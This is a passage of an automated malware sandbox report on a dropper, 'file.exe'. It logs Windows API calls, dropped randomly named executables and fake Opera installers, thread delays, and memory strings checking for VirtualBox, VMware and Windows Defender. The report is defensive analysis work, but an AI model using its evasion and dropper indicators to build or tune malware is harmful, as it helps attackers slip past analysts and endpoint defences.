                    Code function: 15_2_00424194 IsIconic,SetActiveWindow
                    Code function: 15_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
                    Code function: 15_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
                    Code function: 15_2_00417598 IsIconic,GetCapture
                    Code function: 15_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow
                    Code function: 15_2_00417CCE IsIconic,SetWindowPos
                    Code function: 15_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
                    Code function: 15_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary
                    Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe; Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe; Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                    Source: Ca4kQMpVXP8DY5HQ8cbuvFmH.exe, 00000019.00000002.2841566449.00000000004EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKBA
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: C:\Users\user\Desktop\file.exe | Memory allocated: 2C8B8140000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe | Memory allocated: 2C8D1AE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 1710000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 3260000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 3020000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 7CD0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 74D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 82D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 92D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: A6C0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: B6C0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: CD00000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: DD00000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: ED00000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 92D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: A2D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 7CD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 16_2_00401B4B LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_00401B4B LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009BFF9D LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596575
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595667
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595426
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594987
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594691
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594214
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594065
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593326
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593202
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 592980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 592812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 592672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 592522
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 592387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 592264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 592140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 592003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 591875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 591765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 591656
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 4630
Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window / User API: threadDelayed 8001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window / User API: threadDelayed 1635
Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853491\opera_package
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\EaLGCYiRQM2XOtVzyy0ADczF.exe
Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530026645880.dll
Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsiC1CE.tmp\INetC.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\t9y8ObbFiYcOWDbXePjVCsko.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\xgPBlpX67jxMBR1TQvyDxw3Z.exe
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-TSKOF.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\tX8EOAwWEHtskvnslQFfJ9Qi.exe
Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Opera_108.0.5067.24_Autoupdate_x64[3].exe
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libvorbis-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libgcc_s_dw2-1.dll (copy)
Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2403120753276464480.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\lUtN2EBQTg4XAhTAimO3WEPd.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\VtYWoqhIxv66SdBYR6iCW9pR.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\sgtzC1bBRzEH97LXPXHm4FVd.exe
Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_iscrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\uu6kK0oC1Fx2nv3ruwv5SpiV.exe
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libbz2-1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-05C7R.tmp
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-177IU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-R5M1I.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\lsTOGQhYLrM0d7OftxaupYqW.exe
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-4024Q.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\gqqSecZ0iDGmpNUFqal8ttIk.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\oL8szwawgpXgbnICrbhJSivs.exe
Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853201\opera_package
Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-NT0K2.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\OkQwRZm1uDGIMvmp1IlBrcDl.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\oYJcrFAFnphIaAQPo8IrBCWh.exe
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\is-PANN7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531585744560.dll
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\unins000.exe (copy)
Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530974345608.dll
Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530527645904.dll
Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Opera_108.0.5067.24_Autoupdate_x64[3].exe
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libogg-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Simple Web Builder Free\libwinpthread-1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HIELC.tmp\_isetup\_setup64.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\sMiDMUawiFqOcW9q4tC0ZctA.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Y4LnHhMyiOb93nCmM4lvPIko.exe
Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531803244640.dll
Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3TQRB.tmp\_isetup\_setup64.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\W1VpqB7zp2RfA2iQxRvPzC6c.exe
Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_14-5973
Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_17-18563
Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_16-3249
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -99517s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -99391s >= -30000s
